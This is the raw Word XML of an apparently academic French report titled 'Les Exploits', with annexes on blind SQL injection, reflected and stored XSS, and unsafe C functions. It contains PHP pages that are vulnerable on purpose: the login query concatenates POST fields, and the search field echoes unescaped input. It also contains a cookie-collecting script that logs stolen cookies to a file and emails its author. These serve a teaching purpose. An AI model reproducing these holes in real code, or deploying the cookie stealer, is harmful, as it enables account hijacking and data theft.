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80170"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="003F40DE" w:rsidRDefault="003F40DE">
          <w:pPr>
            <w:pStyle w:val="En-ttedetabledesmatires"/>
          </w:pPr>
          <w:r>
            <w:t>Sommaire</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00161178" w:rsidRPr="00161178" w:rsidRDefault="00161178" w:rsidP="00161178"/>
        <w:p w:rsidR="00161178" w:rsidRDefault="00BE655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F40DE">
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc260001142" w:history="1">
            <w:r w:rsidR="00161178" w:rsidRPr="00161BB0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Annexe 1 (Blind SQL Injections)</w:t>
            </w:r>
            <w:r w:rsidR="00161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178">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2600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D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178" w:rsidRDefault="00BE655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0001143" w:history="1">
            <w:r w:rsidR="00161178" w:rsidRPr="00161BB0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Annexe 2 (XSS)</w:t>
            </w:r>
            <w:r w:rsidR="00161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178">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2600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D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178" w:rsidRDefault="00BE655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0001144" w:history="1">
            <w:r w:rsidR="00161178" w:rsidRPr="00161BB0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>XSS non permanent</w:t>
            </w:r>
            <w:r w:rsidR="00161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178">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2600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178" w:rsidRDefault="00BE655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0001145" w:history="1">
            <w:r w:rsidR="00161178" w:rsidRPr="00161BB0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>XSS permanent</w:t>
            </w:r>
            <w:r w:rsidR="00161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178">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2600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178" w:rsidRDefault="00BE655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0001146" w:history="1">
            <w:r w:rsidR="00161178" w:rsidRPr="00161BB0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Annexe 3 (Buffer Overflow)</w:t>
            </w:r>
            <w:r w:rsidR="00161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178">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2600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D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DE" w:rsidRDefault="00BE6554">
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="003F40DE" w:rsidRDefault="003F40DE"/>
    <w:p w:rsidR="003F40DE" w:rsidRDefault="003F40DE">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E669ED" w:rsidRPr="006842D1" w:rsidRDefault="003F40DE" w:rsidP="003F40DE">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc260001142"/>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Annexe 1 (Blind SQL Injections)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00EC02A0" w:rsidRPr="00EC02A0" w:rsidRDefault="00EC02A0" w:rsidP="00EC02A0">
      <w:pPr>
        <w:pStyle w:val="Titre1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1" w:name="_Toc260001143"/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?php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$val = isset($_GET['val']) ? $_GET['val'] : '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f($val == 1) {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$host = '127.0.0.1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$user = 'root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$bdd = 'test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$passwd  = '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mysql_connect($host, $user,$passwd) or die('erreur de connexion au serveur')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mysql_select_db($bdd) or die('erreur de connexion a la base de donnees')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$query = stripslashes('SELECT name,pass FROM user WHERE name=\''.$_POST['login'].'\' AND pass=\''.$_POST['pwd'].'\'')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echo $query.'&lt;br/&gt;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$result = mysql_query($query)or die('Erreur query')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if(mysql_num_rows($result) &gt; 0) {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cho 'Connexion OK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} else {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echo 'Erreur de connexion'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}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}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?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html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body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&lt;form action="injectionSQL.php?val=1" method="POST"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Login : &lt;input type="text" name="login" /&gt;&lt;br/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Mdp : &lt;input type="text" name="pwd"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC02A0" w:rsidRPr="00EC02A0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>&lt;input type="submit" value="Valider"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC02A0" w:rsidRPr="006842D1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C02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6842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/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC02A0" w:rsidRPr="006842D1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6842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body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC02A0" w:rsidRPr="006842D1" w:rsidRDefault="00EC02A0" w:rsidP="00EC02A0">
      <w:pPr>
        <w:pStyle w:val="Titre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6842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&lt;/html&gt;</w:t>
      </w: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EC02A0" w:rsidRPr="006842D1" w:rsidRDefault="00EC02A0" w:rsidP="00EC02A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003F40DE" w:rsidRPr="006842D1" w:rsidRDefault="003F40DE" w:rsidP="00EC02A0">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Annexe 2 (XSS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="003F40DE" w:rsidRPr="006842D1" w:rsidRDefault="003F40DE" w:rsidP="003F40DE">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc260001144"/>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XSS non permanent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51A32" w:rsidRPr="006842D1" w:rsidRDefault="00B51A32" w:rsidP="00B51A32">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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html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title&gt;XSS nperm by Philippe Chauvelin&lt;/title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body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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;center&gt;&lt;h1&gt;Cette page contient une faille XSS&lt;/h1&gt;&lt;br/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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Supposons que le champ suivant soit un moteur de recherche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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;p&gt;&lt;h2&gt;Methode non permanente&lt;/h2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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/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</w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;form method="get" action=""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ab/>
      </w:r>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;input type="text" name="search" size="200" value="&lt;?php if(isset($_GET['search']))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ab/>
      </w:r>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>echo stripslashes($_GET['search']) ?&gt;" /&gt; &lt;!-- Ma faille XSS !--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ab/>
      </w:r>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;br/&gt;&lt;input type="submit" value="rechercher" /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ab/>
        <w:t>&lt;/form&gt;&lt;/p&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/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ab/>
        <w:t>&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51A32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/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F40DE" w:rsidRPr="006842D1" w:rsidRDefault="00B51A32" w:rsidP="00B51A32">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F40DE" w:rsidRPr="006842D1" w:rsidRDefault="003F40DE" w:rsidP="003F40DE">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc260001145"/>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XSS permanent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00E630CC" w:rsidRPr="00E630CC" w:rsidRDefault="00E630CC" w:rsidP="00E630CC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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&lt;?php</w:t>
      </w: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 xml:space="preserve">$cookie = $_GET["c"]; </w:t>
      </w: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if($cookie)</w:t>
      </w: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>{</w:t>
      </w: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 xml:space="preserve">        $fp = fopen("cookies.txt","a");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E630CC" w:rsidRPr="006842D1" w:rsidRDefault="00E630CC" w:rsidP="00E630CC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        fputs($fp,$cookie . "\r\n"); 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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fclose($fp)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ab/>
      </w:r>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>@mail('p.chauvelin@gmail.com', 'XSS', 'Objectif accompli !')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ab/>
      </w:r>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>sleep(3)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>}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>?&gt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>&lt;script&gt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>location.replace("http://localhost /</w:t>
      </w:r>
      <w:r w:rsidR="009E6A77" w:rsidRPr="006842D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>XSS/</w:t>
      </w:r>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> page.php")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t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E630CC" w:rsidRPr="006842D1" w:rsidRDefault="00E630CC" w:rsidP="00E630CC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003F40DE" w:rsidRPr="006842D1" w:rsidRDefault="003F40DE" w:rsidP="00E630CC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006842D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F40DE" w:rsidRPr="00EC02A0" w:rsidRDefault="003F40DE" w:rsidP="003F40DE">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc260001146"/>
      <w:r w:rsidRPr="00EC02A0">
        <w:lastRenderedPageBreak/>
        <w:t>Annexe 3 (Buffer Overflow)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="003F40DE" w:rsidRPr="00EC02A0" w:rsidRDefault="003F40DE" w:rsidP="003F40DE"/>
    <w:p w:rsidR="00426311" w:rsidRPr="00484243" w:rsidRDefault="00426311" w:rsidP="003F40DE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00484243">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Liste des fonctions C/C++ à risque :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51CF8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strcat()</w:t>
      </w:r>
      <w:r w:rsidR="00B51CF8" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> : concatène deux cha</w:t>
      </w:r>
      <w:r w:rsidR="004C3CE7" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>î</w:t>
      </w:r>
      <w:r w:rsidR="00B51CF8" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nes de caractères</w:t>
      </w:r>
      <w:r w:rsidR="004C3CE7" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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strcpy()</w:t>
      </w:r>
      <w:r w:rsidR="00B51CF8" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> : copie une </w:t>
      </w:r>
      <w:r w:rsidR="004C3CE7" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">chaîne </w:t>
      </w:r>
      <w:r w:rsidR="00B51CF8" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dans une autre</w:t>
      </w:r>
      <w:r w:rsidR="004C3CE7" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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sprintf()</w:t>
      </w:r>
      <w:r w:rsidR="00B51CF8" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> : formate une </w:t>
      </w:r>
      <w:r w:rsidR="004C3CE7" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">chaîne </w:t>
      </w:r>
      <w:r w:rsidR="00B51CF8" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>de caractères</w:t>
      </w:r>
      <w:r w:rsidR="004C3CE7" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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vsprintf()</w:t>
      </w:r>
      <w:r w:rsidR="00B51CF8" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="004C3CE7" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>comme sprintf() avec un pointeur vers une liste de paramètres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gets()</w:t>
      </w:r>
      <w:r w:rsidR="004C3CE7" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> : lit chaîne sur sortie standard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scanf()</w:t>
      </w:r>
      <w:r w:rsidR="004C3CE7" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> : lecture formatée depuis entrée standard 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fscanf()</w:t>
      </w:r>
      <w:r w:rsidR="004C3CE7" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> : lecture formatée fichier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sscanf()</w:t>
      </w:r>
      <w:r w:rsidR="004C3CE7" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> : lecture formatée depuis buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00484243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vscanf()</w:t>
      </w:r>
      <w:r w:rsidR="004C3CE7" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="0017592F" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00484243" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>examine l’entrée standard en utilisant une liste variable d'arguments pointeurs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00484243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vsscanf()</w:t>
      </w:r>
      <w:r w:rsidR="00484243" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> : comme vscanf() avec une chaîne.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00426311" w:rsidRPr="00484243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4243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>realpath()</w:t>
      </w:r>
      <w:r w:rsidR="00484243" w:rsidRPr="00484243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="00484243" w:rsidRPr="00484243">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>retourne le chemin canonique absolu</w:t>
      </w:r>
      <w:r w:rsidR="0016415B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> du chemin passé en paramètre.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F54B9" w:rsidRDefault="00426311" w:rsidP="0007029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6415B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>getopt()</w:t>
      </w:r>
      <w:r w:rsidR="0016415B" w:rsidRPr="0016415B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="0016415B" w:rsidRPr="0016415B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>analyse les arguments de la ligne de commande et</w:t>
      </w:r>
      <w:r w:rsidR="0016415B" w:rsidRPr="0016415B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0016415B" w:rsidRPr="0016415B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>renvoie le caractère de l'option s'il en trouve une</w:t>
      </w:r>
      <w:r w:rsidR="0016415B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00070291" w:rsidRDefault="00070291" w:rsidP="00070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6311" w:rsidRDefault="00426311" w:rsidP="00070291">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F54B9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>strecpy()</w:t>
      </w:r>
      <w:r w:rsidR="001F54B9" w:rsidRPr="001F54B9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; streadd() : </w:t>
      </w:r>
      <w:r w:rsidR="001F54B9" w:rsidRPr="001F54B9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ces fonctions substitue des caractères binaires avec des équivalents de chaîne</w:t>
      </w:r>
      <w:r w:rsidR="001F54B9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00070291" w:rsidRPr="001F54B9" w:rsidRDefault="00070291" w:rsidP="00070291">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00426311" w:rsidRPr="001F54B9" w:rsidRDefault="00426311" w:rsidP="00070291">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F54B9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>strtrns()</w:t>
      </w:r>
      <w:r w:rsidR="0016415B" w:rsidRPr="001F54B9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="00070291" w:rsidRPr="00070291">
        <w:rPr>
          <w:rStyle w:val="mediumtext"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>copie dans une nouvelle chaîne la même chaine en remplaçant les anciens segments par des nouveaux.</w:t>
      </w:r>
      <w:r w:rsidR="00070291">
        <w:rPr>
          <w:rStyle w:val="mediumtext"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00426311" w:rsidRPr="001F54B9" w:rsidSect="00E669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3E" w:rsidRDefault="000E103E" w:rsidP="003F40DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="000E103E" w:rsidRDefault="000E103E" w:rsidP="003F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171"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w:rsidR="003F40DE" w:rsidRDefault="00BE6554">
        <w:pPr>
          <w:pStyle w:val="Pieddepage"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:fldSimple w:instr=" PAGE   \* MERGEFORMAT ">
          <w:r w:rsidR="00040D9E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>1</w:t>
          </w:r>
        </w:fldSimple>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="003F40DE" w:rsidRDefault="003F40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3E" w:rsidRDefault="000E103E" w:rsidP="003F40DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="000E103E" w:rsidRDefault="000E103E" w:rsidP="003F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DE" w:rsidRDefault="003F40DE">
    <w:pPr>
      <w:pStyle w:val="En-tte"/>
    </w:pPr>
    <w:r>
      <w:t>Philippe Chauvelin</w:t>
    </w:r>
    <w:r>
      <w:tab/>
      <w:t>Les Exploits</w:t>
    </w:r>
    <w:r>
      <w:tab/>
      <w:t>EPSI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0DE"/>
    <w:rsid w:val="00040D9E"/>
    <w:rsid w:val="00070291"/>
    <w:rsid w:val="000E103E"/>
    <w:rsid w:val="00161178"/>
    <w:rsid w:val="0016415B"/>
